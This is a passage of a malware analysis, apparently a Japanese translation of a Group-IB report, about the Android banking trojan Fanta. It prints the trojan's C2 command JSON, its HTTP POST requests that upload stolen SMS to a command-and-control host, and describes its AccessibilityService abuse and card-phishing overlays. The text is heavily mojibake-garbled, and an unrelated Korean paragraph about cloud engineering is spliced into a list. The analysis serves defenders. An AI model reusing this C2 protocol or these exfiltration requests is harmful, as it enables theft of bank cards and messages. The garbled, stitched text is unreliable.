· ããŒã SMSã¡ãã»ãŒãžãéä¿¡ãã: ãã©ã¡ãŒã¿ã«ã¯ãé»è©±çªå·ãSMS ã¡ãã»ãŒãžã®ããã¹ããéä¿¡ãããã¡ãã»ãŒãžã® ID ãå«ãŸããŸãã ãã®èå¥åã¯ã次ã®ã¿ã€ãã®ã¡ãã»ãŒãžããµãŒããŒã«éä¿¡ãããšãã«äœ¿çšãããŸãã setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }
· ããŒã é»è©±ãããããUSSDã³ãã³ããå®è¡ãã: é»è©±çªå·ãŸãã¯ã³ãã³ããå¿çæ¬æã«å«ãŸããŸãã
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }
· ããŒã ééãã©ã¡ãŒã¿ã®å€æŽ.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }
· ããŒã åçãã©ã¡ãŒã¿ã®å€æŽ.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }
· ããŒã SmsManager ãã£ãŒã«ããå€æŽãã.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }
· ããŒã ææããããã€ã¹ãã SMS ã¡ãã»ãŒãžãåéãã.
{ "response": [ { "mode": 9 } ], "status":"ok" }
· ããŒã æºåž¯é»è©±ãå·¥å Žåºè·æã®èšå®ã«ãªã»ããããŸã:
{ "response": [ { "mode": 11 } ], "status":"ok" }
· ããŒã ReadDialogãã©ã¡ãŒã¿ãå€æŽãã.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- ã¿ã€ããæå®ããŠã¡ãã»ãŒãžãéä¿¡ãã setSmsStatusã ãã®ãªã¯ãšã¹ãã¯ã³ãã³ãã®å®è¡åŸã«è¡ãããŸãã SMSã¡ãã»ãŒãžãéä¿¡ããã ãªã¯ãšã¹ãã¯æ¬¡ã®ããã«ãªããŸãã
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>
- ããŒã¿ããŒã¹ã®ã³ã³ãã³ããã¢ããããŒãããŠããŸãã ãªã¯ãšã¹ãããšã« XNUMX è¡ãéä¿¡ãããŸãã 次ã®ããŒã¿ããµãŒããŒã«éä¿¡ãããŸãã
· ã¯ãã㌠â ãµãŒããŒããåä¿¡ãã Cookie
· ã¢ãŒã â æååå®æ° setSaveInboxSms
· å ¥æ â ãªã¯ãšã¹ãã®éä¿¡æã«åä¿¡ããææããã€ã¹ã® ID ç»é²ããã
· íŽëŒì°ë êž°ë° AI/MLë° ê³ ì±ë¥ 컎íší ì íµí ëì§íž ížìì êž°ìŽ â Edward Hsu, Rescale CPO ë§ì ìì§ëìŽë§ ì€ì¬ êž°ì ìê² íŽëŒì°ëë R&Dëì§íž ì íì 첫 ëšê³ìŒ ë¿ì ëë€. íŽëŒì°ë ììì íì©íŽ ìì§ëìŽë§ íì ì ìœì íŽê²°íë ëšê³ë¥Œ ëìŽ, ì뮬ë ìŽì ìŽìì íµí©íê³ ìµì ííë©°, ê¶ê·¹ì ìŒë¡ë ëªšëž êž°ë°ì íì 곌 ìì¬ ê²°ì ì ì§ìíì¬ ì ì íì ê²°ì í ë ë°ìŽí° êž°ë° ìì§ëìŽë§ì ì ì©íê³ ì í©ëë€. Rescaleì ìŽë¬í íì ì ëêž° ìíŽ ì»Žíší ì¶ì² ìì§, íµí© ë°ìŽí° íšëžëŠ, ë©íë°ìŽí° êŽëŠ¬ ë±ì ê°ë°íê³ ììµëë€. ìŽë² ì늬륌 ë¹ë € ë¹ìŠëì€ ê²œìë ¥ ì ê³ ë¥Œ ìí ëì§íž ížì ë° ëì§íž ì€ë ë ì ëµ ê°ë° ë°©ë²ì ëí ìžì¬ìŽížë¥Œ ëëê³ ì í©ëë€. â çŸåšã®ããŒã¿ããŒã¹ ã¬ã³ãŒãå ã®ããã¹ã (ãã£ãŒã«ã d ããŒãã«ãã ãã° ããŒã¿ããŒã¹å 㧠а)
· æ° â çŸåšã®ããŒã¿ããŒã¹ ã¬ã³ãŒãã®åå (ãã£ãŒã«ã p ããŒãã«ãã ãã° ããŒã¿ããŒã¹å 㧠а)
· SMS_ã¢ãŒã â æŽæ°å€ (ãã£ãŒã«ã m ããŒãã«ãã ãã° ããŒã¿ããŒã¹å 㧠а)ãªã¯ãšã¹ãã¯æ¬¡ã®ããã«ãªããŸãã
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
ãµãŒããŒãžã®éä¿¡ã«æåãããšãè¡ã¯ããŒãã«ããåé€ãããŸãã ãµãŒããŒããè¿ããã JSON ãªããžã§ã¯ãã®äŸ:
{ "response":[], "status":"ok" }
AccessibilityService ãšã®å¯Ÿè©±
AccessibilityService ã¯ãé害ã®ãã人ã Android ããã€ã¹ã䜿ããããããããã«å®è£ ãããŸããã ã»ãšãã©ã®å Žåãã¢ããªã±ãŒã·ã§ã³ãšå¯Ÿè©±ããã«ã¯ç©ççãªå¯Ÿè©±ãå¿ èŠã§ãã AccessibilityService ã䜿çšãããšãããããããã°ã©ã ã§å®è¡ã§ããŸãã Fanta ã¯ãã®ãµãŒãã¹ãå©çšããŠãéè¡ã¢ããªã±ãŒã·ã§ã³ã«åœã®ãŠã£ã³ããŠãäœæãããŠãŒã¶ãŒãã·ã¹ãã èšå®ãäžéšã®ã¢ããªã±ãŒã·ã§ã³ãéããªãããã«ããã
ãã®ããã€ã®æšéŠ¬ã¯ãAccessibilityService ã®æ©èœã䜿çšããŠãææããããã€ã¹ã®ç»é¢äžã®èŠçŽ ãžã®å€æŽãç£èŠããŸãã åè¿°ããããã«ãFanta èšå®ã«ã¯ããã€ã¢ãã° ããã¯ã¹ã§ã®æäœã®ãã°èšé²ãæ åœãããã©ã¡ãŒã¿ãå«ãŸããŠããŸãã èªã¿åããã€ã¢ãã°ã ãã®ãã©ã¡ãŒã¿ãèšå®ãããŠããå Žåãã€ãã³ããããªã¬ãŒããããã±ãŒãžã®ååãšèª¬æã«é¢ããæ å ±ãããŒã¿ããŒã¹ã«è¿œå ãããŸãã ãã®ããã€ã®æšéŠ¬ã¯ãã€ãã³ããããªã¬ãŒããããšæ¬¡ã®ã¢ã¯ã·ã§ã³ãå®è¡ããŸãã
- 次ã®å Žåã«ãæ»ãããŒãšããŒã ããŒãæŒãããšãã·ãã¥ã¬ãŒãããŸãã
· ãŠãŒã¶ãŒãããã€ã¹ãåèµ·åãããå Žå
· ãŠãŒã¶ãŒããAvitoãã¢ããªã±ãŒã·ã§ã³ãåé€ãããå ŽåããŸãã¯ã¢ã¯ã»ã¹æš©ãå€æŽãããå Žå
· ããŒãžäžã«ãAvitoãã¢ããªã±ãŒã·ã§ã³ã«ã€ããŠã®èšèŒãããå Žå
· Google Play ãããã¯ã ã¢ããªã±ãŒã·ã§ã³ãéããšã
· AccessibilityService èšå®ã䜿çšããŠããŒãžãéããšã
· ãã·ã¹ãã ã»ãã¥ãªãã£ããã€ã¢ãã°ããã¯ã¹ã衚瀺ããããšã
· ãä»ã®ã¢ããªã«éããŠæç»ãèšå®ã§ããŒãžãéãããšã
· ãã¢ããªã±ãŒã·ã§ã³ãããŒãžãéããšããå埩ãšãªã»ãããããããŒã¿ã®ãªã»ãããããèšå®ã®ãªã»ãããããéçºè ããã«ãããã¹ãã·ã£ã«ã ãæ©äŒãããç¹å¥ãªæ©äŒãããç¹å¥ãªæš©å©ã
· ã€ãã³ããç¹å®ã®ã¢ããªã±ãŒã·ã§ã³ã«ãã£ãŠçæãããå Žåãã¢ããªã±ãŒã·ã§ã³äžèŠ§
- ã¢ã³ããã€ã
- ãã¹ã¿ãŒã©ã€ã
- ã¯ãªãŒã³ãã¹ã¿ãŒ
- x86 CPUçšã®ã¯ãªãŒã³ãã¹ã¿ãŒ
- Meizu ã¢ããªã±ãŒã·ã§ã³ã®æš©é管ç
- MIUIã»ãã¥ãªãã£
- Clean Master - ãŠã€ã«ã¹å¯Ÿçããã£ãã·ã¥ããã³ã¬ããŒãž ã¯ãªãŒããŒ
- ãã¢ã¬ã³ã¿ã«ã³ã³ãããŒã«ãšGPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock ããã³ Web ã»ãã¥ãªã㣠ããŒã¿ç
- ãŠã€ã«ã¹ã¯ãªãŒããŒãã¢ã³ããŠã€ã«ã¹ãã¯ãªãŒã㌠(MAX ã»ãã¥ãªãã£)
- ã¢ãã€ã« ã¢ã³ããŠã€ã«ã¹ ã»ãã¥ãªã㣠PRO
- ã¢ãã¹ã ã¢ã³ããŠã€ã«ã¹ãšç¡æä¿è· 2019
- ã¢ãã€ã«ã»ãã¥ãªã㣠MegaFon
- Xperia çš AVG ãããã¯ã·ã§ã³
- ã¢ãã€ã«ã»ãã¥ãªãã£
- Malwarebytes ãŠã€ã«ã¹å¯Ÿçãšä¿è·
- Android çšãŠã€ã«ã¹å¯Ÿç 2019
- ã»ãã¥ãªã㣠ãã¹ã¿ãŒ - ãŠã€ã«ã¹å¯ŸçãVPNãã¢ããªããã¯ãããŒã¹ã¿ãŒ
- Huawei ã¿ãã¬ããçš AVG ã¢ã³ããŠã€ã«ã¹ ã·ã¹ãã ãããŒãžã£ãŒ
- ãµã ã¹ã³ã®ã¢ã¯ã»ã·ããªãã£
- ãµã ã¹ã³ã¹ããŒããããŒãžã£ãŒ
- ã»ãã¥ãªãã£ãã¹ã¿ãŒ
- å éè£ çœ®
- Dr.Webã¯
- Dr.Webã®ã»ãã¥ãªãã£ã¹ããŒã¹
- Dr.Web ã¢ãã€ã« ã³ã³ãããŒã« ã»ã³ã¿ãŒ
- Dr.Web ã»ãã¥ãªã㣠ã¹ããŒã¹ ã©ã€ã
- Dr.Web ã¢ãã€ã« ã³ã³ãããŒã« ã»ã³ã¿ãŒ
- ãŠã€ã«ã¹å¯Ÿçãšã¢ãã€ã«ã»ãã¥ãªãã£
- ã«ã¹ãã«ã¹ã㌠ã€ã³ã¿ãŒããã ã»ãã¥ãªãã£: ãŠã€ã«ã¹å¯Ÿçãšä¿è·
- ã«ã¹ãã«ã¹ããŒã®ããããªãŒå¯¿åœïŒã»ãŒããŒïŒããŒã¹ã¿ãŒ
- Kaspersky Endpoint Security - ä¿è·ãšç®¡ç
- AVG ç¡æã¢ã³ããŠã€ã«ã¹ 2019 â Android ã®ä¿è·
- Androidã®ãŠã€ã«ã¹å¯Ÿç
- ããŒãã³ã¢ãã€ã«ã»ãã¥ãªãã£ãšã¢ã³ããŠã€ã«ã¹
- ãŠã€ã«ã¹å¯Ÿçããã¡ã€ã¢ãŠã©ãŒã«ãVPNãã¢ãã€ã« ã»ãã¥ãªãã£
- ã¢ãã€ã« ã»ãã¥ãªãã£: ãŠã€ã«ã¹å¯ŸçãVPNãçé£é²æ¢
- Android çšãŠã€ã«ã¹å¯Ÿç
- çãçªå·ã« SMS ã¡ãã»ãŒãžãéä¿¡ãããšãã«èš±å¯ãèŠæ±ãããå ŽåãFanta ã¯ãã§ãã¯ããã¯ã¹ã®ã¯ãªãã¯ãã·ãã¥ã¬ãŒãããŸãã éžæãå¿ããªãã§ãã ãã ãšãã¿ã³ éã.
- ããã€ã®æšéŠ¬ãã管çè æš©éãå¥å¥ªããããšãããšãé»è©±ç»é¢ãããã¯ãããŸãã
- æ°ãã管çè ãè¿œå ã§ããªãããã«ããŸãã
- ãŠã€ã«ã¹å¯Ÿçã¢ããªã±ãŒã·ã§ã³ã®å Žå ãã¯ã¿ãŒãŠã§ã è åšãæ€ç¥ãããšãã¡ã³ã¿ããã¿ã³ãæŒãç䌌ããã ç¡èŠãã.
- ã€ãã³ããã¢ããªã±ãŒã·ã§ã³ã«ãã£ãŠçæãããå Žåãããã€ã®æšéŠ¬ã¯æ»ããã¿ã³ãšããŒã ãã¿ã³ãæŒãããšãã·ãã¥ã¬ãŒãããŸãã ãµã ã¹ã³ããã€ã¹ã±ã¢.
- Fanta ã¯ãçŽ 30 çš®é¡ã®ã€ã³ã¿ãŒããã ãµãŒãã¹ã®ãªã¹ãããã¢ããªã±ãŒã·ã§ã³ãèµ·åãããå Žåãéè¡ã«ãŒãã«é¢ããæ
å ±ãå
¥åããããã®ãã©ãŒã ãåãããã£ãã·ã³ã° ãŠã£ã³ããŠãäœæããŸãã ãã®äžã«ã¯ãAliExpressãBookingãAvitoãGoogle Play Market ComponentãPandaoãDrom Auto ãªã©ããããŸãã
ãã£ãã·ã³ã°ãã©ãŒã
Fanta ã¯ãææããããã€ã¹ã§ã©ã®ã¢ããªã±ãŒã·ã§ã³ãå®è¡ãããŠããããåæããŸãã 察象ã®ã¢ããªã±ãŒã·ã§ã³ãéããããšãããã€ã®æšéŠ¬ã¯ä»ã®ãã¹ãŠã®ã¢ããªã±ãŒã·ã§ã³ã®äžã«ãã£ãã·ã³ã° ãŠã£ã³ããŠã衚瀺ããŸãããã®ãŠã£ã³ããŠã¯ãéè¡ã«ãŒãæ å ±ãå ¥åããããã®ãã©ãŒã ã§ãã ãŠãŒã¶ãŒã¯æ¬¡ã®ããŒã¿ãå ¥åããå¿ èŠããããŸãã
- ÐПЌеÑкаÑÑÑ
- ã«ãŒãæå¹æé
- CVV
- ã«ãŒãææè å (äžéšã®éè¡ã§ã¯ãããŸãã)
å®è¡äžã®ã¢ããªã±ãŒã·ã§ã³ã«å¿ããŠãç°ãªããã£ãã·ã³ã° ãŠã£ã³ããŠã衚瀺ãããŸãã 以äžã«ãã®äžéšã®äŸã瀺ããŸãã
é«åºŠïŒ
ã¢ããïŒ
ä»ã®ããã€ãã®ã¢ããªã±ãŒã·ã§ã³ã®å ŽåãäŸãã° Google Play ããŒã±ãããAviasalesãPandaoãäºçŽãããªããŽ:
å®éã¯ã©ãã ã£ãã®ã
幞ããªããšã«ãèšäºã®åé ã§èª¬æãã SMS ã¡ãã»ãŒãžãåä¿¡ãã人ç©ã¯ããµã€ããŒã»ãã¥ãªãã£ã®å°é家ã§ããããšãå€æããŸããã ãããã£ãŠããã£ã¬ã¯ã¿ãŒã§ã¯ãªãå®éã®ããŒãžã§ã³ã¯ã以åã«èªããããã®ãšã¯ç°ãªããŸãããã人ç©ãèå³æ·±ã SMS ãåä¿¡ãããã®åŸãããã Group-IB Threat Hunting Intelligence ããŒã ã«æž¡ããŸããã æ»æã®çµæããã®èšäºã§ãã ããããŒãšã³ãã§ãããïŒ ãã ãããã¹ãŠã®ã¹ããŒãªãŒãæåè£ã«çµããããã§ã¯ãããŸããããŸãããéã倱ã£ããã£ã¬ã¯ã¿ãŒãºã«ããã®ããã«èŠããªãããã«ããããã«ãã»ãšãã©ã®å Žåãé·ãã説æãããŠãã次ã®ã«ãŒã«ãéµå®ããã ãã§ååã§ãã
- Android OS ãæèŒããã¢ãã€ã« ããã€ã¹çšã®ã¢ããªã±ãŒã·ã§ã³ã Google Play 以å€ã®ãœãŒã¹ããã€ã³ã¹ããŒã«ããªãã§ãã ããã
- ã¢ããªã±ãŒã·ã§ã³ãã€ã³ã¹ããŒã«ãããšãã¯ãã¢ããªã±ãŒã·ã§ã³ã«ãã£ãŠèŠæ±ãããæš©éã«ç¹ã«æ³šæããŠãã ãã
- ããŠã³ããŒããããã¡ã€ã«ã®æ¡åŒµåã«æ³šæããŠãã ãã
- Android OS ã¢ããããŒããå®æçã«ã€ã³ã¹ããŒã«ãã
- çããããªãœãŒã¹ã«ã¢ã¯ã»ã¹ãããããããããã¡ã€ã«ãããŠã³ããŒããããããªãã§ãã ããã
- SMS ã¡ãã»ãŒãžã§åä¿¡ãããªã³ã¯ãã¯ãªãã¯ããªãã§ãã ããã
åºæïŒ habr.com